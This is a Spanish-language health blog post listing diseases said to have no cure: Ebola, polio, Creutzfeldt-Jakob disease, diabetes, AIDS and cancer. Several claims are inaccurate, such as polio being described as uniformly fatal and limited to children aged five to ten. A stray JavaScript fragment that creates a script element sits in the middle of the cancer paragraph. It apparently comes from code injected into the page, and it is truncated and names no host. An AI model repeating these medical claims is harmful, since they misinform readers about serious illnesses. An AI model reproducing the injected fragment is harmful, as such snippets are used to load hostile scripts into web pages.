Salud y belleza » Enfermedades

Sin remedio

Sin Comentarios

Qué envidia provocan las matemáticas a otras ciencias: según la lógica de los números, un “problema” es sencillamente aquella contrariedad que la inteligencia y el ingenio siempre son capaces de resolver. Por ende, desde la rigurosa óptica matematicista, todo tiene una justa solución.

En la ciencia de la medicina el panorama no presenta el mismo grado de optimismo: el stock de problemas es ampliamente superior al número de remedios, y dentro de un hospital no todas las dificultades pueden ser superadas.

Como podemos comprobar, mientras la matemática es un “deporte” de resultado único, en la medicina las definiciones se doblan: hay victorias pero también derrotas.

Hoy no cantaremos sobre los triunfos sino, por el contrario, hablaremos de aquellas enfermedades para las que aún no hay cura ni soluciones.

“En la Medicina son muchos los factores que condicionan el éxito. Principalmente está  el caso de las herramientas: si bien hay cura para muchos problemas, aún existen enfermedades imposibles de tratar. Un doctor no puede resolver los problemas de todos sus pacientes porque, sencillamente, no tiene los instrumentos necesarios para ello” confiesa un profesional de la medicina que, claro, también envidia la exactitud de las matemáticas.

¿Cuáles son, entonces, algunas de las enfermedades para las que no se dispone de una solución? Las siguientes…

Ébola: se trata de un virus mortal que provoca severa fiebre y hemorragia a todo aquel que infecta. La tasa de mortalidad por casos del Ébola es del 85%.

Poliomielitis: es una enfermedad vírica que ataca a niños de entre cinco y diez años. Afecta al sistema nervioso y tiene como síntomas fiebre, dolor de cabeza, náuseas y espasmos. Si bien existen vacunas que reducen las chances de captar “polio”, la enfermedad es mortal.

Enfermedad de Creutzfeldt-Jakob: es patología degenerativa y mortal que afecta gravemente al sistema nervioso. Suele producirse entre adultos (40-80 años), sus síntomas abarcan cambios de comportamiento, demencia senil, alteración de la visión y movimientos corporales rebeldes. En ocho de cada diez casos, el enfermo suele fallecer al año de aparecidos los síntomas.

Diabetes: la diabetes no es una enfermedad mortal, es decir, puede causar la muerte pero también puede ser controlada. Aún así, no existe cura para la diabetes que es un trastorno mediante el cual el organismo experimenta problemas al producir o controlar la insulina.

El Sida: el síndrome de inmunodeficiencia adquirida es una enfermedad contagiosa que ataca al sistema inmunológico y que está producida por el virus VIH que lo destruye. En la actualidad existen tratamientos para “controlar” la enfermedad mediante los cuales un buen porcentaje de enfermos con VIH pueden llevar una vida satisfactoria.

El Cáncer: es uno de los trastornos más temidos y extraños. Se conoce como “cáncer” a más de cien enfermedades cuya característica común es el crecimiento descontrolado de células malignas. Representa, una de las más importantes causas de muerte en todo el mundo y, más allá de todos los avances que se han conseguido, sólo se ha logrado disminuir el número de muertes.var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.